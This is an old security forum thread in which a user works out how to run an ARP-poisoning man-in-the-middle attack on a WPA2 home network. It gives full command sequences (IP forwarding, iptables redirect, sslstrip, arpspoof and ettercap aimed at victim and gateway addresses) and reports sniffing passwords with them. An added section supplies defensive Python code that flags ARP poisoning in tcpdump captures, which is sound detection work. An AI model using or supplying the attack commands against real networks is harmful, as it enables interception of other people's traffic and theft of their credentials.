Hi guys,
I've been piddling around with arp-poisoning using Ettercap-ng and Arpspoof along with Sslstrip and various Dsniff programs like urlsnarf, webspy, etc. I can successfully perform a mitm on my open network and on my network with WEP encryption enabled, but I would like to be able to do the same on it with WPA encryption enabled. (Obviously I know the passkey cause it's my network.)
I was previously under the impression that it was difficult or impossible to perform an Arp Poisoning on a WPA encrypted network due to the fact that merely knowing the passkey is not sufficient to decrypt the packets because of the WPA handshake. Then I stumbled upon this thread "http://www.backtrack-linux.org/forums/old-newbie-area/24774-ettercap-wpa.html" which claimed that performing a mitm attack on a WPA network is done exactly the same as on an unencrypted network (no handshake or passkey stuff required as long as you're connected to the AP).
Incidentally, I have tried performing the attack just like on an unencrypted network (except I tried both Arpspoof and Ettercap-ng) but I end up DoSing both myself and my victim laptop.
So, my questions are:
1. Is the answer to this thread correct in saying that performing a MITM attack on a WPA network is done the same as on an open network?
2. If question 1. is "yes", then what am I doing wrong? (I will post my commands if that is the case)
Thanks in advance!
Well you're connected to the network right ? So yes..
Posting commands used is always good to allow people to see what you have tried.
Ok, thanks. I appreciate the help. I'm fairly certain it's not a driver issue cause as I said before aircrack-ng works fine. I am using Backtrack 4 running on a Dell Mini 9 with an Intel 5100 card.
Here are my commands. Obviously they are run as root.
Using Arpspoof:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1
Using Ettercap-NG:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -k -f -l 8080
ettercap -T -i wlan0 -Tq -M ARP // //
Also, for etter.conf I have changed ec_uid to 0 and ec_gid to 0. I did not uncomment the iptables line since I was using Sslstrip.
Thanks for the help! I really appreciate it.
Ok, I figured it out. Thanks TAPE for clarifying that it's possible. For all those who may read this post in the future I would like to clarify:
Contrary to what some other sites (I can remember specifically but I've read it somewhere) say, it is entirely possible to perform a MITM attack using Arpspoof (and probably Ettercap too but I haven't got it to work yet) on a WPA or WPA2 encrypted network. I successfully used Arpspoof and Sslstrip to sniff passwords on my WPA2 network. I'm sure many many people have done this before but I had spent a long time trying to find out if it was even possible, which it is.
Just in case anyone is wondering what commands I used:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
cd /home/christopher/.sslstrip-0.7 # of course you will have to change this to your location
python sslstrip.py -k -f -l 8080
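The point the thread settles is that WPA/WPA2 only protects frames between a client and the AP; once you are an associated client, ARP on the LAN behaves exactly as on an open network, so ARP poisoning (and the unsolicited replies arpspoof sends every couple of seconds) is visible to anyone watching ARP traffic on that LAN. The defender's side of this is to notice it. Below is an added example, not from the thread or from the Arpspoof/Ettercap/Sslstrip projects: it parses constructed lines in the default tcpdump rendering of ARP replies and flags two things a poisoning run produces, an IP (the gateway here) whose claimed MAC changes, and a sender that emits unsolicited replies at a high rate. The IPs, MACs and timestamps are constructed sample data; the optional trusted table stands in for a static ARP entry for the gateway.

```python
"""Added example: spot ARP cache poisoning in tcpdump ARP output (constructed data)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float          # seconds since midnight, taken from the tcpdump timestamp
    sender_ip: str     # IP the reply claims to speak for
    sender_mac: str    # MAC it claims that IP lives at


# Matches tcpdump's default ARP reply line, e.g.
# "12:00:05.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28"
_ARP_REPLY_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2})\.(\d{6}) ARP, Reply "
    r"(\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})"
)


def parse_tcpdump_arp(lines):
    """Return ArpReply records for every ARP reply line; requests and other lines are skipped."""
    out = []
    for line in lines:
        m = _ARP_REPLY_RE.match(line)
        if not m:
            continue
        h, mi, s, us, ip, mac = m.groups()
        ts = int(h) * 3600 + int(mi) * 60 + int(s) + int(us) / 1e6
        out.append(ArpReply(ts, ip, mac.lower()))
    return out


# Constructed capture: the real gateway (aa:bb:cc:00:00:01) answers once, then a
# second station starts claiming 192.168.1.1 every two seconds.
SAMPLE_CAPTURE = [
    "12:00:00.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.7, length 28",
    "12:00:00.001000 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "12:00:01.000000 ARP, Reply 192.168.1.7 is-at aa:bb:cc:00:00:07, length 28",
    "12:00:05.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:07.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:09.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:11.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
]


def detect_mac_changes(replies, trusted=None):
    """Return (ts, ip, previously_seen_mac, new_mac) for every reply that contradicts
    the IP->MAC binding learned earlier or pinned in `trusted` (a static-ARP stand-in).
    Pinned entries are never overwritten; learned ones are kept at first sight."""
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for r in replies:
        prev = table.get(r.sender_ip)
        if prev is None:
            table[r.sender_ip] = r.sender_mac
        elif prev != r.sender_mac:
            alerts.append((r.ts, r.sender_ip, prev, r.sender_mac))
    return alerts


def detect_reply_floods(replies, window=10.0, threshold=3):
    """Return sender IPs that appear in more than `threshold` replies inside any
    `window`-second span; a normal host answers a handful of requests, not a steady stream."""
    by_ip = {}
    for r in replies:
        by_ip.setdefault(r.sender_ip, []).append(r.ts)
    flagged = set()
    for ip, stamps in by_ip.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 > threshold:
                flagged.add(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    replies = parse_tcpdump_arp(SAMPLE_CAPTURE)
    for ts, ip, old, new in detect_mac_changes(replies):
        print(f"{ts:.3f} {ip} changed from {old} to {new}")
    print("reply floods from:", detect_reply_floods(replies))
```

With a real capture, feed it `tcpdump -n -i wlan0 arp` output; pinning the gateway in `trusted` is the same idea as a static ARP entry on the client, and on managed infrastructure the equivalent controls are wireless client isolation and dynamic ARP inspection, either of which stops a station from speaking for the gateway in the first place.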
Perhaps best to first try and single out a specific host with ettercap
Code:
ettercap -Tq -i wlan0 -M arp:remote /192.168.1.7/ /192.168.1.1/
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Thanks guys! Actually, I've got it working with Ettercap in the meantime using the same commands as on an unencrypted network. Sorry I'm so slow to post. Thanks for the help TAPE, I actually had set specific targets I just typed it wrong in my post, but thanks for your time.
Also, Gitsnik, thanks for the tip, I'll look into making my own Arp packets. That sounds like a useful thing to know how to do. I really appreciate you guys.
I will mark this thread as solved.
Thanks!
edit: Actually, I can't figure out how to mark this thread as solved. If this is important please let me know how, otherwise I will assume that only the Admins can do that. thanks guys
Last edited by BobaFett; 06-01-2010 at 11:24 PM.